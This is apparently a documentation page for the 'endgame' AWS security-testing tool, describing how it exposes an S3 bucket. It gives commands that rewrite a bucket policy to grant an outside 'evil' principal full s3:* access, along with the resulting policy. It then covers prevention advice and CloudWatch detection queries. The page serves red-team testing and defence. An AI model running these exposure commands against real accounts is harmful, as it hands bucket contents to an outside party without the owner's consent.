Skip to content

S3 Buckets

Steps to Reproduce

  • To expose the resource using endgame, run the following from the victim account:
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:evil

endgame expose --service s3 --name test-resource-exposure
  • To verify that the S3 bucket has been shared with the public, run the following from the victim account:
aws s3api get-bucket-policy --bucket test-resource-exposure
  • Observe that the contents match the example shown below.


The response of the get-bucket-policy command will return the below. Observe how the Evil Principal (arn:aws:iam::999988887777:evil) is granted full access to the S3 bucket.

    "Policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:evil\"},\"Action\":\"s3:*\",\"Resource\":[\"arn:aws:s3:::test-resource-exposure\",\"arn:aws:s3:::test-resource-exposure/*\"]}]}"




‼️ Note: At the time of this writing, AWS Access Analyzer does NOT support auditing of this resource type to prevent resource exposure. We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool. 😊

  • Leverage Strong Resource-based Policies: Follow the resource-based policy recommendations in the Prevention Guide
  • Trusted Accounts Only: Ensure that S3 Buckets are only shared with trusted accounts, and that the trusted accounts truly need access to the S3 Bucket.
  • Ensure access is necessary: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
  • Restrict access to IAM permissions that could lead to exposure of your S3 Buckets: Tightly control access to the following IAM actions:
    • s3:GetBucketPolicy: Grants permission to return the policy of the specified bucket. This includes information on which AWS accounts and principals have access to the bucket.
    • s3:ListAllMyBuckets: Grants permission to list all buckets owned by the authenticated sender of the request
    • s3:PutBucketPolicy: Grants permission to add or replace a bucket policy on a bucket.

Also, consider using Cloudsplaining to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report here

Basic Detection

The following CloudWatch Log Insights query will include exposure actions taken by endgame:

fields eventTime, eventSource, eventName, userIdentity.arn, userAgent 
| filter eventSource='' AND eventName='PutBucketPolicy'

The following query detects policy modifications which include the default IOC string:

fields eventTime, eventSource, eventName, userIdentity.arn, userAgent 
| filter eventSource='' AND (eventName='PutBucketPolicy' and @message like 'Endgame')

(More specific queries related to the policy contents do not work due to how CWL parses the requestParameters object on these calls)

This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.